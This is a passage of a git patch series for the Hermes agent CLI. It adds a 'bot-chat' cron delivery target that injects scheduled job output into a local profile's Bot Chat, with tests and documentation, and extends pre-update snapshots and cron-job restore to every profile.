as fh: + fh.write(message) + query_file = fh.name + + argv += [ + "chat", "--in", "~", "-c", "Bot Chat", "--create-if-missing", + "-Q", "--query-file", query_file, + ] + + result = subprocess.run( + argv, + capture_output=True, + text=True, + timeout=_get_bot_chat_delivery_timeout(), + env=env, + creationflags=windows_hide_flags(), + ) + if result.returncode != 0: + tail = (result.stderr or result.stdout or "").strip()[-500:] + msg = ( + f"bot-chat delivery to profile " + f"'{profile or '(own)'}' failed (exit {result.returncode})" + + (f": {tail}" if tail else "") + ) + logger.warning("Job '%s': %s", job_id, msg) + return msg + logger.info( + "Job '%s': delivered to Bot Chat of profile '%s'", + job_id, profile or "(own)", + ) + return None + except subprocess.TimeoutExpired: + msg = ( + f"bot-chat delivery to profile '{profile or '(own)'}' timed out " + f"after {_get_bot_chat_delivery_timeout()}s (the bot's turn may " + "still complete; raise cron.bot_chat_delivery_timeout_seconds if " + "this recurs)" + ) + logger.warning("Job '%s': %s", job_id, msg) + return msg + except Exception as e: + msg = f"bot-chat delivery failed: {str(e) or type(e).__name__}" + logger.warning("Job '%s': %s", job_id, msg, exc_info=True) + return msg + finally: + if query_file: + try: + os.unlink(query_file) + except OSError: + pass + + def _normalize_deliver_value(deliver) -> str: """Normalize a stored/submitted ``deliver`` value to its canonical string form. @@ -2416,6 +2562,67 @@ def _normalize_deliver_value(deliver) -> str: # (those with a configured home chat_id) in _expand_routing_tokens. _ROUTING_TOKENS = frozenset({"all"}) +# Pseudo-platform for delivering job output INTO a profile's canonical +# "Bot Chat" session as a real inbound turn (the bot sees it, runs a turn, +# and can respond — Bot Mode's agent-to-agent lane, not a transcript +# mirror). ``bot-chat`` targets the job's own profile; ``bot-chat:`` +# targets a named profile on THIS machine. Deliberately excluded from the +# ``all`` routing token: ``all`` fans out to messaging home channels, and a +# bot-chat delivery costs a full agent turn. +BOT_CHAT_PLATFORM = "bot-chat" + + +def parse_bot_chat_deliver_token(part: str) -> Optional[str]: + """Return the target profile for a ``bot-chat[:]`` deliver token. + + Returns ``""`` for the bare token (the job's own profile), the profile + name for the explicit form, or ``None`` when ``part`` is not a bot-chat + token at all. Case-insensitive on the token; the profile name is + normalized by the profile layer at resolve time. + """ + raw = (part or "").strip() + lowered = raw.lower() + if lowered == BOT_CHAT_PLATFORM: + return "" + prefix = BOT_CHAT_PLATFORM + ":" + if lowered.startswith(prefix): + return raw[len(prefix):].strip() + return None + + +def _resolve_bot_chat_target(job: dict, profile_arg: str) -> Optional[dict]: + """Resolve a bot-chat deliver token to a concrete delivery target. + + ``profile_arg`` is ``""`` for the job's own profile (the HERMES_HOME + this scheduler runs under — machine-local and self-referential, so no + ``-p`` flag is needed at send time) or an explicit profile name that + must exist in THIS machine's profile root. Cross-machine delivery is + intentionally unsupported: names resolve only against the local + ``~/.hermes/profiles/`` tree, so same-named profiles on other gateways + can never be targeted by accident. + """ + if not profile_arg: + # Own profile: chat subprocess inherits HERMES_HOME, no name needed. + return {"platform": BOT_CHAT_PLATFORM, "chat_id": "", "thread_id": None} + try: + from hermes_cli.profiles import normalize_profile_name, profile_exists + + canon = normalize_profile_name(profile_arg) + if not profile_exists(canon): + logger.warning( + "Job '%s': bot-chat delivery profile '%s' not found on this " + "machine — skipping target", + job.get("id", "?"), profile_arg, + ) + return None + return {"platform": BOT_CHAT_PLATFORM, "chat_id": canon, "thread_id": None} + except Exception: + logger.warning( + "Job '%s': failed to resolve bot-chat profile '%s'", + job.get("id", "?"), profile_arg, exc_info=True, + ) + return None + def _expand_routing_tokens(part: str) -> List[str]: """Expand a routing-intent token to concrete platform names. @@ -2771,6 +2978,17 @@ def _deliver_result(job: dict, content: str, adapters=None, loop=None) -> Option chat_id = target["chat_id"] thread_id = target.get("thread_id") + # bot-chat targets don't ride a gateway adapter: the output becomes a + # real inbound turn in the target profile's canonical Bot Chat via the + # chat CLI lane (the same one Bot Mode agent-to-agent sends use). The + # bot runs a turn and can respond — handled before the Platform enum + # below, which knows nothing about this pseudo-platform. + if platform_name == BOT_CHAT_PLATFORM: + bot_chat_error = _deliver_to_bot_chat(job, content, chat_id) + if bot_chat_error: + delivery_errors.append(bot_chat_error) + continue + # Diagnostic: log thread_id for topic-aware delivery debugging origin = _resolve_origin(job) or {} origin_thread = origin.get("thread_id") @@ -4561,6 +4779,11 @@ def _preflight_check_delivery(job: dict) -> Optional[str]: part = part.strip() if not part or part.lower() in {"local", "origin", "all"}: continue + # bot-chat targets need no gateway credentials — they deliver via a + # local chat subprocess. Unknown-profile failures surface per run in + # last_delivery_error (and are validated at create time). + if parse_bot_chat_deliver_token(part) is not None: + continue platform_parts.append(part.split(":", 1)[0].strip()) if not platform_parts: return None diff --git a/hermes_cli/profiles.py b/hermes_cli/profiles.py index f6e3c79f30..6e83a824f3 100644 --- a/hermes_cli/profiles.py +++ b/hermes_cli/profiles.py @@ -387,6 +387,25 @@ def profile_exists(name: str) -> bool: return get_profile_dir(canon).is_dir() +def list_profile_names() -> List[str]: + """Cheap name-only profile listing: ``default`` plus profile dirs. + + Unlike :func:`list_profiles` this reads NO per-profile config/metadata — + it is a directory scan, safe to call from hot paths (cron delivery-target + listings, create-time validation). + """ + names = ["default"] + profiles_root = _get_profiles_root() + try: + if profiles_root.is_dir(): + for entry in sorted(profiles_root.iterdir()): + if entry.is_dir() and entry.name != "default" and _PROFILE_ID_RE.match(entry.name): + names.append(entry.name) + except OSError: + pass + return names + + # --------------------------------------------------------------------------- # Alias / wrapper script management # --------------------------------------------------------------------------- diff --git a/hermes_cli/subcommands/cron.py b/hermes_cli/subcommands/cron.py index 73acc073c6..d617007b8b 100644 --- a/hermes_cli/subcommands/cron.py +++ b/hermes_cli/subcommands/cron.py @@ -36,7 +36,11 @@ def build_cron_parser(subparsers, *, cmd_cron: Callable) -> None: cron_create.add_argument("--name", help="Optional human-friendly job name") cron_create.add_argument( "--deliver", - help="Delivery target: origin, local, telegram, discord, signal, or platform:chat_id", + help=( + "Delivery target: origin, local, telegram, discord, signal, " + "platform:chat_id, or bot-chat[:profile] (inject output into a " + "local profile's canonical Bot Chat as a message the bot responds to)" + ), ) cron_create.add_argument("--repeat", type=int, help="Optional repeat count") cron_create.add_argument( diff --git a/tests/cron/test_cron_bot_chat_delivery.py b/tests/cron/test_cron_bot_chat_delivery.py new file mode 100644 index 0000000000..92ebadde49 --- /dev/null +++ b/tests/cron/test_cron_bot_chat_delivery.py @@ -0,0 +1,216 @@ +"""Bot Chat cron delivery: deliver='bot-chat[:]' injects job output +into a local profile's canonical Bot Chat session as a real inbound turn. + +Covers token parsing, target resolution (own profile / named / missing), +preflight exemption, create-time validation, the subprocess delivery lane, +and the delivery-targets listing used by UI pickers. +""" + +import subprocess +from unittest import mock + +import pytest + +from cron import scheduler as sched +from cron.scheduler import ( + BOT_CHAT_PLATFORM, + _deliver_to_bot_chat, + _preflight_check_delivery, + _resolve_bot_chat_target, + _resolve_delivery_targets, + parse_bot_chat_deliver_token, +) + + +# ── token parsing ──────────────────────────────────────────────────────────── + +def test_bare_token_targets_own_profile(): + assert parse_bot_chat_deliver_token("bot-chat") == "" + assert parse_bot_chat_deliver_token(" Bot-Chat ") == "" + + +def test_named_token_returns_profile(): + assert parse_bot_chat_deliver_token("bot-chat:research") == "research" + assert parse_bot_chat_deliver_token("BOT-CHAT:Research") == "Research" + + +def test_non_bot_chat_tokens_pass_through(): + assert parse_bot_chat_deliver_token("telegram:-100:17") is None + assert parse_bot_chat_deliver_token("origin") is None + assert parse_bot_chat_deliver_token("local") is None + assert parse_bot_chat_deliver_token("all") is None + # A platform whose name merely CONTAINS bot-chat must not match. + assert parse_bot_chat_deliver_token("bot-chatter") is None + + +# ── target resolution ──────────────────────────────────────────────────────── + +def test_own_profile_resolves_without_name(): + target = _resolve_bot_chat_target({"id": "j1"}, "") + assert target == {"platform": BOT_CHAT_PLATFORM, "chat_id": "", "thread_id": None} + + +def test_named_profile_resolves_when_exists(): + with mock.patch("hermes_cli.profiles.profile_exists", return_value=True): + target = _resolve_bot_chat_target({"id": "j1"}, "research") + assert target is not None + assert target["platform"] == BOT_CHAT_PLATFORM + assert target["chat_id"] == "research" + + +def test_unknown_profile_resolves_to_none(): + with mock.patch("hermes_cli.profiles.profile_exists", return_value=False): + assert _resolve_bot_chat_target({"id": "j1"}, "ghost") is None + + +def test_resolve_delivery_targets_combines_with_platform_targets(): + """bot-chat rides the same comma-separated deliver string as platforms.""" + job = {"id": "j1", "deliver": "bot-chat,telegram"} + with mock.patch.object(sched, "_get_home_target_chat_id", return_value="-100123"), \ + mock.patch.object(sched, "_get_home_target_thread_id", return_value=None), \ + mock.patch.object(sched, "_is_known_delivery_platform", return_value=True), \ + mock.patch.object(sched, "_resolve_origin", return_value=None): + targets = _resolve_delivery_targets(job) + platforms = {t["platform"] for t in targets} + assert BOT_CHAT_PLATFORM in platforms + assert "telegram" in platforms + + +# ── preflight ──────────────────────────────────────────────────────────────── + +def test_preflight_ignores_bot_chat_targets(): + """bot-chat needs no gateway credentials — preflight must not block it.""" + assert _preflight_check_delivery({"id": "j1", "deliver": "bot-chat"}) is None + assert _preflight_check_delivery({"id": "j1", "deliver": "bot-chat:research"}) is None + + +def test_preflight_still_blocks_unknown_platforms(): + with mock.patch.object(sched, "_is_known_delivery_platform", return_value=False): + err = _preflight_check_delivery({"id": "j1", "deliver": "nonexistent-platform"}) + assert err is not None and "not a known" in err + + +# ── create-time validation ─────────────────────────────────────────────────── + +def test_create_validation_rejects_unknown_profile(): + from tools.cronjob_tools import _validate_bot_chat_deliver + + with mock.patch("hermes_cli.profiles.profile_exists", return_value=False): + err = _validate_bot_chat_deliver("bot-chat:ghost") + assert err is not None + assert "machine-local" in err + + +def test_create_validation_accepts_bare_and_existing(): + from tools.cronjob_tools import _validate_bot_chat_deliver + + assert _validate_bot_chat_deliver("bot-chat") is None + assert _validate_bot_chat_deliver(None) is None + assert _validate_bot_chat_deliver("telegram:-100") is None + with mock.patch("hermes_cli.profiles.profile_exists", return_value=True): + assert _validate_bot_chat_deliver("bot-chat:research") is None + + +# ── delivery lane ──────────────────────────────────────────────────────────── + +def _completed(returncode=0, stderr=""): + return subprocess.CompletedProcess(args=[], returncode=returncode, stdout="", stderr=stderr) + + +def test_deliver_runs_canonical_bot_chat_lane(): + """The subprocess must use the Bot Mode agent-to-agent chat lane: + chat --in ~ -c "Bot Chat" --create-if-missing -Q --query-file .""" + calls = {} + + def fake_run(argv, **kwargs): + calls["argv"] = argv + calls["kwargs"] = kwargs + return _completed() + + with mock.patch.object(sched.subprocess, "run", side_effect=fake_run), \ + mock.patch.object(sched.shutil, "which", return_value="/usr/bin/hermes"): + err = _deliver_to_bot_chat({"id": "j1", "name": "Daily digest"}, "the output", "") + + assert err is None + argv = calls["argv"] + assert argv[0] == "/usr/bin/hermes" + assert "-p" not in argv # own profile: subprocess inherits HERMES_HOME + assert "chat" in argv + assert "Bot Chat" in argv + assert "--create-if-missing" in argv + assert "-Q" in argv + assert "--query-file" in argv + # Message rides a temp file, never inline argv (quote/expansion safety). + assert not any("the output" in str(a) for a in argv) + + +def test_deliver_named_profile_uses_p_flag_and_clears_home(): + calls = {} + + def fake_run(argv, **kwargs): + calls["argv"] = argv + calls["kwargs"] = kwargs + return _completed() + + with mock.patch.object(sched.subprocess, "run", side_effect=fake_run), \ + mock.patch.object(sched.shutil, "which", return_value="/usr/bin/hermes"), \ + mock.patch.dict(sched.os.environ, {"HERMES_HOME": "/tmp/other-profile"}): + err = _deliver_to_bot_chat({"id": "j1", "name": "n"}, "out", "research") + + assert err is None + argv = calls["argv"] + assert argv[1:3] == ["-p", "research"] + # -p owns resolution; the scheduler's own HERMES_HOME must not leak in. + assert "HERMES_HOME" not in calls["kwargs"]["env"] + + +def test_deliver_failure_returns_error_string(): + with mock.patch.object( + sched.subprocess, "run", return_value=_completed(returncode=1, stderr="boom") + ), mock.patch.object(sched.shutil, "which", return_value="/usr/bin/hermes"): + err = _deliver_to_bot_chat({"id": "j1", "name": "n"}, "out", "") + assert err is not None + assert "boom" in err + + +def test_deliver_timeout_returns_error_string(): + with mock.patch.object( + sched.subprocess, "run", + side_effect=subprocess.TimeoutExpired(cmd="hermes", timeout=600), + ), mock.patch.object(sched.shutil, "which", return_value="/usr/bin/hermes"): + err = _deliver_to_bot_chat({"id": "j1", "name": "n"}, "out", "") + assert err is not None + assert "timed out" in err + + +def test_deliver_message_carries_cron_attribution(tmp_path): + """The injected turn must self-identify as scheduled output, not the user.""" + captured = {} + + def fake_run(argv, **kwargs): + qf = argv[argv.index("--query-file") + 1] + with open(qf, encoding="utf-8") as fh: + captured["message"] = fh.read() + return _completed() + + with mock.patch.object(sched.subprocess, "run", side_effect=fake_run), \ + mock.patch.object(sched.shutil, "which", return_value="/usr/bin/hermes"): + _deliver_to_bot_chat({"id": "j1", "name": "Daily digest"}, "the payload", "") + + assert 'Cronjob "Daily digest" output' in captured["message"] + assert "not the user" in captured["message"] + assert "the payload" in captured["message"] + + +# ── delivery-targets listing (UI pickers) ──────────────────────────────────── + +def test_delivery_targets_include_local_profiles(): + with mock.patch("hermes_cli.profiles.list_profile_names", + return_value=["default", "research"]): + targets = sched.cron_delivery_targets() + ids = [t["id"] for t in targets] + assert f"{BOT_CHAT_PLATFORM}:default" in ids + assert f"{BOT_CHAT_PLATFORM}:research" in ids + bot_chat_entries = [t for t in targets if t["id"].startswith(BOT_CHAT_PLATFORM)] + # No gateway home channel needed for bot-chat targets. + assert all(t["home_target_set"] for t in bot_chat_entries) diff --git a/tools/cronjob_tools.py b/tools/cronjob_tools.py index ae507b75c7..f9ef0fc077 100644 --- a/tools/cronjob_tools.py +++ b/tools/cronjob_tools.py @@ -461,6 +461,40 @@ def _normalize_deliver_param(value: Any) -> Optional[str]: return text or None +def _validate_bot_chat_deliver(deliver: Optional[str]) -> Optional[str]: + """Validate any ``bot-chat[:]`` deliver elements at create time. + + Bot Chat delivery is machine-local: the named profile must exist on THIS + machine (the one whose scheduler will fire the job). Failing loudly here + beats a per-run ``last_delivery_error`` at 3am — especially for Desktop + clients whose merged multi-gateway rosters may show same-named profiles + from other machines. Returns an error string or None. + """ + if not deliver: + return None + try: + from cron.scheduler import parse_bot_chat_deliver_token + from hermes_cli.profiles import normalize_profile_name, profile_exists + except Exception: + return None # validation is best-effort; resolution re-checks at fire time + for part in str(deliver).split(","): + profile_arg = parse_bot_chat_deliver_token(part.strip()) + if profile_arg is None or not profile_arg: + continue # not a bot-chat token, or bare token (own profile) + try: + canon = normalize_profile_name(profile_arg) + except Exception: + return f"invalid bot-chat profile name '{profile_arg}'" + if not profile_exists(canon): + return ( + f"bot-chat delivery profile '{profile_arg}' not found on this " + "gateway's machine. Bot Chat delivery is machine-local — use a " + "profile that exists here (hermes profile list), or omit the " + "name (deliver='bot-chat') for the job's own profile." + ) + return None + + def _resolve_cron_context_deliver(deliver: Optional[str]) -> Optional[str]: """Resolve ``origin`` to a concrete target for cron-context creates. @@ -1265,6 +1299,12 @@ def cronjob( if base_url_error: return tool_error(base_url_error, success=False) + # bot-chat deliver targets are machine-local: named profiles must + # exist here, and a bad name should fail the CREATE, not the run. + bot_chat_error = _validate_bot_chat_deliver(_normalize_deliver_param(deliver)) + if bot_chat_error: + return tool_error(bot_chat_error, success=False) + # Validate context_from references existing jobs if context_from: from cron.jobs import get_job as _get_job @@ -1489,6 +1529,9 @@ def cronjob( if name is not None: updates["name"] = name if deliver is not None: + bot_chat_error = _validate_bot_chat_deliver(_normalize_deliver_param(deliver)) + if bot_chat_error: + return tool_error(bot_chat_error, success=False) updates["deliver"] = _resolve_cron_context_deliver( _normalize_deliver_param(deliver) ) @@ -1684,7 +1727,7 @@ Scheduling from cron-run sessions is disabled by default and enabled via cron.al }, "deliver": { "type": "string", - "description": "Omit this parameter to auto-deliver back to the current chat and topic (recommended). Auto-detection preserves thread/topic context. Only set explicitly when the user asks to deliver somewhere OTHER than the current conversation. Values: 'origin' (same as omitting), 'local' (no delivery, save only), 'all' (fan out to every connected home channel), or platform:chat_id:thread_id for a specific destination. Combine with comma: 'origin,all' delivers to the origin plus every other connected channel. Examples: 'telegram:-1001234567890:17585', 'discord:#engineering', 'sms:+15551234567', 'all'. WARNING: 'platform:chat_id' without :thread_id loses topic targeting. 'all' resolves at fire time, so a job created before a channel was wired up will pick it up automatically once connected." + "description": "Omit this parameter to auto-deliver back to the current chat and topic (recommended). Auto-detection preserves thread/topic context. Only set explicitly when the user asks to deliver somewhere OTHER than the current conversation. Values: 'origin' (same as omitting), 'local' (no delivery, save only), 'all' (fan out to every connected home channel), 'bot-chat' (inject the output into this profile's canonical Bot Chat as a real message — the bot reads it, acts on it, and responds in that chat; 'bot-chat:' targets another local profile's Bot Chat, costing that bot an agent turn per run), or platform:chat_id:thread_id for a specific destination. Combine with comma: 'origin,all' delivers to the origin plus every other connected channel. Examples: 'telegram:-1001234567890:17585', 'discord:#engineering', 'sms:+15551234567', 'all', 'bot-chat:research'. WARNING: 'platform:chat_id' without :thread_id loses topic targeting. 'all' resolves at fire time (and never includes bot-chat targets), so a job created before a channel was wired up will pick it up automatically once connected." }, "skills": { "type": "array", diff --git a/tui_gateway/methods_tools.py b/tui_gateway/methods_tools.py index cece5fbbe4..f54e6f0582 100644 --- a/tui_gateway/methods_tools.py +++ b/tui_gateway/methods_tools.py @@ -1752,6 +1752,11 @@ def _(rid, params: dict) -> dict: if params.get("continuity") is not None else None ), + # Optional delivery target — notably 'bot-chat[:name]' + # (canonical Bot Chat injection) from the Desktop Bot + # Mode cronjob dialog. Omitted/empty keeps the + # cronjob() default. + deliver=(str(params.get("deliver") or "").strip() or None), ) ), ) diff --git a/website/docs/developer-guide/cron-internals.md b/website/docs/developer-guide/cron-internals.md index a18c1a9dd6..427692eb92 100644 --- a/website/docs/developer-guide/cron-internals.md +++ b/website/docs/developer-guide/cron-internals.md @@ -254,6 +254,7 @@ Most platforms also accept an optional thread/topic as a third segment: `platfor | WeCom | `wecom` or `wecom:` | Bare name delivers to WeCom | | BlueBubbles | `bluebubbles` or `bluebubbles:` | Bare name delivers to iMessage via BlueBubbles | | QQ Bot | `qqbot` or `qqbot:` | Bare name delivers to QQ (Tencent) via Official API v2 | +| Bot Chat | `bot-chat` or `bot-chat:` | Inject into a local profile's canonical Bot Chat (the bot responds) | Platforms in the first group have explicit, validated target syntax — named channels (`#channel`), topics/threads, room/user IDs, group IDs, or phone numbers. The remaining platforms accept the generic `platform:` form (the value after the colon is used verbatim as the destination ID); a bare platform name always delivers to the home channel. @@ -261,6 +262,8 @@ Platforms in the first group have explicit, validated target syntax — named ch For **Telegram topics**, use `telegram::` (e.g., `telegram:-1001234567890:17585`). For **Slack threads**, the third segment is the parent message's `thread_ts` (e.g., `slack:C0123ABCD45:1700000000.000100`), so it only applies when replying under an existing message. +**Bot Chat** (`bot-chat`, `bot-chat:`) is a machine-local pseudo-platform, not a gateway adapter: the scheduler delivers by running `hermes [-p ] chat --in ~ -c "Bot Chat" --create-if-missing -Q --query-file ` — the same lane Bot Mode agent-to-agent messages use — so the output arrives as a real inbound turn in the profile's canonical Bot Chat and the bot runs a full agent turn on it (alternation-safe by construction; this is the chat command lane, not a transcript mirror). The bare token targets the job's own profile; the named form is validated against `~/.hermes/profiles/` at create time and again at fire time, and never resolves across machines. Bot-chat targets are excluded from the `all` routing token and from delivery preflight (no gateway credentials involved). The per-delivery subprocess timeout is `cron.bot_chat_delivery_timeout_seconds` (default 600). + ### Response Wrapping By default (`cron.wrap_response: true`), cron deliveries are wrapped with: diff --git a/website/docs/guides/automate-with-cron.md b/website/docs/guides/automate-with-cron.md index a1a787fe88..20bb490207 100644 --- a/website/docs/guides/automate-with-cron.md +++ b/website/docs/guides/automate-with-cron.md @@ -246,6 +246,28 @@ The `--deliver` flag controls where results go: | `slack` | `--deliver slack` | Your Slack home channel | | Specific chat | `--deliver telegram:-1001234567890` | A specific Telegram group | | Threaded | `--deliver telegram:-1001234567890:17585` | A specific Telegram topic thread | +| Bot Chat | `--deliver bot-chat` | Inject output into this profile's canonical Bot Chat — the bot reads it and responds | +| Bot Chat (named) | `--deliver bot-chat:research` | Another local profile's Bot Chat | + +### Bot Chat delivery + +`bot-chat` targets deliver the job's output **into a profile's canonical "Bot +Chat" session as a real message** — the bot receives it like any other message, +acts on anything that needs action, and responds in that chat. This is the +target to use when you want a bot to *see and react to* scheduled output +instead of just having it archived in Run history. + +Things to know: + +- **Machine-local.** The profile must exist on the machine running the + scheduler (`hermes profile list`). Names are validated at create time; + profiles on other gateways/machines cannot be targeted. +- **Costs a bot turn.** Each delivery runs a full agent turn in the target + bot's Bot Chat — budget accordingly for high-frequency jobs. +- **Combinable.** `--deliver bot-chat,telegram` posts to the bot AND your + Telegram home channel. The `all` token never expands to bot-chat targets. +- The delivered message is prefixed so the bot knows it came from a scheduled + job, not from you. --- diff --git a/website/docs/user-guide/features/cron.md b/website/docs/user-guide/features/cron.md index fa2efc863c..ab1e185f14 100644 --- a/website/docs/user-guide/features/cron.md +++ b/website/docs/user-guide/features/cron.md @@ -374,12 +374,23 @@ When scheduling jobs, you specify where the output goes: | `"weixin"` | Weixin (WeChat) | | | `"bluebubbles"` | BlueBubbles (iMessage) | | | `"qqbot"` | QQ Bot (Tencent QQ) | | +| `"bot-chat"` | This profile's canonical Bot Chat — the bot reads the output and responds | Machine-local | +| `"bot-chat:research"` | Another local profile's Bot Chat | Validated at create time | | `"all"` | Fan out to every connected home channel | Resolved at fire time | | `"telegram,discord"` | Fan out to a specific set of channels | Comma-separated list | | `"origin,all"` | Deliver to the origin **plus** every other connected channel | Combine any tokens | The agent's final response is automatically delivered to the configured `deliver:` target — the agent does not send messages itself, so there is nothing to call in the cron prompt. +### Bot Chat delivery (`bot-chat`) + +`bot-chat` delivers the output **into a profile's canonical "Bot Chat" session as a real message**. Unlike every other target — where the recipient is a human reading a channel — the recipient here is the bot itself: it receives the output as an incoming message, acts on anything that needs action, and responds in its chat. Use it when scheduled output should be *processed*, not just posted. + +- `bot-chat` (bare) targets the job's own profile. +- `bot-chat:` targets another profile **on the same machine**. Names are validated against `hermes profile list` when the job is created; profiles on other gateways or machines can never be targeted, so same-named profiles across machines are unambiguous. +- Each delivery costs the target bot one full agent turn — mind the schedule frequency. +- Composes with other targets (`bot-chat,telegram`) but is never included in `all`. + ### Routing intent (`all`) `all` lets you ship one cron job to every messaging channel you have configured, without having to enumerate them by name. It is **resolved at fire time**, so a job created before you wired up Telegram will pick up Telegram on the next tick after you set `TELEGRAM_HOME_CHANNEL`. @@ -557,6 +568,18 @@ cron: Or set the `HERMES_CRON_MEDIA_SEND_TIMEOUT` environment variable. The resolution order is: env var → config.yaml → 300s default. A timed-out attachment is recorded in the job's run status as a partial delivery failure (the text still delivers). +## Bot Chat delivery timeout + +A `bot-chat` delivery runs a full agent turn in the target bot's chat, so its bound is minutes, not seconds — 600s by default: + +```yaml +# ~/.hermes/config.yaml +cron: + bot_chat_delivery_timeout_seconds: 900 +``` + +A timed-out delivery is recorded in `last_delivery_error`; the bot's turn may still complete on its own. + ## No-agent mode (script-only jobs) For recurring jobs that don't need LLM reasoning — classic watchdogs, disk/memory alerts, heartbeats, CI pings — pass `no_agent=True` at creation time. The scheduler runs your script on schedule and delivers its stdout directly, skipping the agent entirely: From b96a9b7408bdb4dd21c41273d3255f4a98a64d2c Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 04:52:18 -0700 Subject: [PATCH 033/161] test(cron): delivery-targets test scopes platform assertions past bot-chat entries cron_delivery_targets() now also lists machine-local bot-chat: entries; the sibling test's exact set-equality assertion predates them. Scope the platform assertions to gateway entries and pin that bot-chat entries are always home_target_set. --- tests/cron/test_scheduler.py | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/tests/cron/test_scheduler.py b/tests/cron/test_scheduler.py index 64033d0b09..02278a1e4c 100644 --- a/tests/cron/test_scheduler.py +++ b/tests/cron/test_scheduler.py @@ -2194,11 +2194,20 @@ class TestCronDeliveryTargets: targets = {t["id"]: t for t in cron_delivery_targets()} - assert set(targets) == {"matrix", "telegram"} + # bot-chat: entries (machine-local Bot Chat injection) ride + # the same listing but are not gateway platforms — scope the + # platform assertions to the gateway entries. + platform_targets = {k: v for k, v in targets.items() if not k.startswith("bot-chat")} + + assert set(platform_targets) == {"matrix", "telegram"} # Configured but no home channel → surfaced, flagged for the UI. - assert targets["matrix"]["home_target_set"] is False - assert targets["matrix"]["home_env_var"] == "MATRIX_HOME_ROOM" - assert targets["telegram"]["home_target_set"] is False + assert platform_targets["matrix"]["home_target_set"] is False + assert platform_targets["matrix"]["home_env_var"] == "MATRIX_HOME_ROOM" + assert platform_targets["telegram"]["home_target_set"] is False + # Bot Chat targets need no home channel: whatever profiles exist on + # this machine must all be listed as ready. + bot_chat = [v for k, v in targets.items() if k.startswith("bot-chat")] + assert all(t["home_target_set"] for t in bot_chat) class TestHomeTargetEnvVarRegistry: From 15751166291cfa82b20b233d33aac61c1a07ade6 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 04:55:50 -0700 Subject: [PATCH 034/161] fix(update): pre-update snapshots now cover every profile, not just the invoking one (#66140) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The code swap and gateway fleet restart touch all profiles, but the pre-update quick snapshot photographed only the invoking profile's home — siblings had no snapshot for the post-update safety nets or manual restore to draw on. - backup.py: create_pre_update_snapshots_all_profiles() — the SAME snapshot set, per-file 1GiB cap, and keep policy as the invoking profile (no partial tier, no new restore-coherence class), each into the sibling's own state-snapshots/; restore_cron_jobs_all_profiles() runs the #34600 cron-loss safety net per profile against its OWN snapshot (same-generation by construction). - update_cmd.py: sibling snapshots taken right after the invoking profile's (best-effort, receipt-recorded); post-update cron restore extended to every sibling. - Docs: updating.md pre-update snapshot step now states the per-profile behavior and the file-loss-recovery vs rollback contract. - 9 unit tests + E2E (real files: sibling snapshot on disk, clobbered jobs.json restored 7/7 from the sibling's own snapshot, keep=1 prune). --- hermes_cli/backup.py | 98 ++++++++++++++ hermes_cli/update_cmd.py | 58 +++++++++ tests/hermes_cli/test_backup_all_profiles.py | 129 +++++++++++++++++++ website/docs/getting-started/updating.md | 2 +- 4 files changed, 286 insertions(+), 1 deletion(-) create mode 100644 tests/hermes_cli/test_backup_all_profiles.py diff --git a/hermes_cli/backup.py b/hermes_cli/backup.py index 7742b0540a..30e3b6cce3 100644 --- a/hermes_cli/backup.py +++ b/hermes_cli/backup.py @@ -1776,6 +1776,104 @@ def restore_cron_jobs_if_emptied( return {"restored": True, "job_count": snap_count, "snapshot_id": snapshot_id} +def _sibling_profile_homes(invoking_home: Path) -> list[tuple[str, Path]]: + """(name, home) for every OTHER profile on this install. Never raises. + + The update's code swap and gateway fleet restart touch every profile, + so the pre-update snapshot must too (#66140). The invoking profile is + excluded — its snapshot is taken by the existing call. + """ + homes: list[tuple[str, Path]] = [] + try: + from hermes_cli.profiles import ( + _get_default_hermes_home, + _get_profiles_root, + _PROFILE_ID_RE, + ) + + invoking = invoking_home.resolve() + default_home = _get_default_hermes_home() + if default_home.is_dir() and default_home.resolve() != invoking: + homes.append(("default", default_home)) + root = _get_profiles_root() + if root.is_dir(): + for entry in sorted(root.iterdir()): + if ( + entry.is_dir() + and entry.name != "default" + and _PROFILE_ID_RE.match(entry.name) + and entry.resolve() != invoking + ): + homes.append((entry.name, entry)) + except Exception as exc: + logger.debug("Sibling profile enumeration failed: %s", exc) + return homes + + +def create_pre_update_snapshots_all_profiles( + invoking_home: Optional[Path] = None, + keep: Optional[int] = None, + max_file_size: Optional[int] = None, +) -> Dict[str, str]: + """Pre-update quick snapshots for every SIBLING profile (#66140). + + Same snapshot set, same per-file size cap, same keep policy as the + invoking profile's snapshot — identical semantics per profile, no + partial-tier coherence class. Each sibling's snapshot lands under its + OWN ``/state-snapshots/`` so per-profile restore tooling finds + it where it expects. Returns ``{profile_name: snapshot_id}`` for the + siblings that snapshotted successfully. Never raises. + """ + results: Dict[str, str] = {} + home = invoking_home or get_hermes_home() + for name, profile_home in _sibling_profile_homes(home): + try: + snap_id = create_quick_snapshot( + label="pre-update", + hermes_home=profile_home, + keep=keep, + max_file_size=max_file_size, + ) + if snap_id: + results[name] = snap_id + except Exception as exc: + logger.debug("Pre-update snapshot for profile %s failed: %s", name, exc) + return results + + +def restore_cron_jobs_all_profiles( + profile_snapshots: Dict[str, str], + invoking_home: Optional[Path] = None, +) -> list[Dict[str, Any]]: + """Run the cron-jobs safety net for every sibling profile (#66140). + + ``profile_snapshots`` is the map returned by + :func:`create_pre_update_snapshots_all_profiles`. Each profile's live + ``cron/jobs.json`` is compared against ITS OWN snapshot — restores are + same-generation by construction (the snapshot was taken minutes ago by + this update run). Returns one result dict per restored profile, each + with a ``profile`` key added. Never raises. + """ + restored: list[Dict[str, Any]] = [] + if not profile_snapshots: + return restored + home = invoking_home or get_hermes_home() + by_name = dict(_sibling_profile_homes(home)) + for name, snap_id in profile_snapshots.items(): + profile_home = by_name.get(name) + if profile_home is None: + continue + try: + result = restore_cron_jobs_if_emptied(snap_id, hermes_home=profile_home) + except Exception as exc: + logger.debug("Cron restore check for profile %s failed: %s", name, exc) + continue + if result: + result["profile"] = name + restored.append(result) + return restored + + def _prune_quick_snapshots(root: Path, keep: int = _QUICK_DEFAULT_KEEP) -> int: """Remove oldest quick snapshots beyond the keep limit. Returns count deleted.""" if not root.exists(): diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index f41a37fb67..f7a0239298 100644 --- a/hermes_cli/update_cmd.py +++ 